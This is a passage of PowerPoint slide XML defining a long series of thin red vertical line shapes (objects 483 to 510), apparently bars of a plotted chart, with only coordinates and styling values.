                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="151727"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="object 483"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6828948" y="5683297"/>
            <a:ext cx="0" cy="307037"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="154939">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="154729"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="484" name="object 484"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6849177" y="5541881"/>
            <a:ext cx="0" cy="445455"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="224789">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="224591"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="485" name="object 485"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6849177" y="5538907"/>
            <a:ext cx="0" cy="451747"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="227964">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="227594"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="486" name="object 486"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6869011" y="5714039"/>
            <a:ext cx="0" cy="273062"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="137794">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="137715"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="487" name="object 487"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6869011" y="5711064"/>
            <a:ext cx="0" cy="279353"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="140969">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="140718"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="object 488"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6888844" y="5602972"/>
            <a:ext cx="0" cy="385055"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="194310">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="193763"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="489" name="object 489"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6888844" y="5599996"/>
            <a:ext cx="0" cy="390088"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="196850">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="196765"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="object 490"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6909076" y="5614077"/>
            <a:ext cx="0" cy="373730"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="188594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="188159"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491" name="object 491"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6909076" y="5611102"/>
            <a:ext cx="0" cy="380021"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="191769">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="191162"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="object 492"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6928909" y="5564096"/>
            <a:ext cx="0" cy="424063"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="213994">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="213381"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="493" name="object 493"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6928909" y="5561121"/>
            <a:ext cx="0" cy="429097"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="216535">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="216384"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="object 494"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6948743" y="5664058"/>
            <a:ext cx="0" cy="323396"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="163194">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="162937"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="495" name="object 495"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6948743" y="5661083"/>
            <a:ext cx="0" cy="329687"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="166369">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="165940"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="496" name="object 496"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6968575" y="5414157"/>
            <a:ext cx="0" cy="573807"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="289560">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="289044"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="497" name="object 497"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6968575" y="5411183"/>
            <a:ext cx="0" cy="578840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="292100">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="292047"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="object 498"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6988410" y="5552993"/>
            <a:ext cx="0" cy="434130"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="219075">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="218985"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="499" name="object 499"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6988410" y="5550015"/>
            <a:ext cx="0" cy="440422"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="222250">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="221987"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="500" name="object 500"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7008242" y="5225343"/>
            <a:ext cx="0" cy="762559"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="384810">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="384325"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501" name="object 501"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7008242" y="5222367"/>
            <a:ext cx="0" cy="767593"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="387350">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="387328"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502" name="object 502"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7028077" y="5519672"/>
            <a:ext cx="0" cy="468106"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="236219">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="235798"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="503" name="object 503"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7028077" y="5516699"/>
            <a:ext cx="0" cy="474397"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="239394">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="238801"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="504" name="object 504"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7047909" y="4775525"/>
            <a:ext cx="0" cy="1211790"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="611505">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="611317"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="505" name="object 505"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7047909" y="4772550"/>
            <a:ext cx="0" cy="1218081"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="614680">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="614320"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="506" name="object 506"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7067743" y="5258662"/>
            <a:ext cx="0" cy="728584"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="367664">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="367512"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="507" name="object 507"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7067743" y="5255686"/>
            <a:ext cx="0" cy="734876"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="370839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="370514"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="508" name="object 508"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7087576" y="4525622"/>
            <a:ext cx="0" cy="1462201"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="737869">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="737425"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="509" name="object 509"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7087576" y="4522649"/>
            <a:ext cx="0" cy="1468493"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="741044">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="740428"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="object 510"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7107410" y="5136491"/>
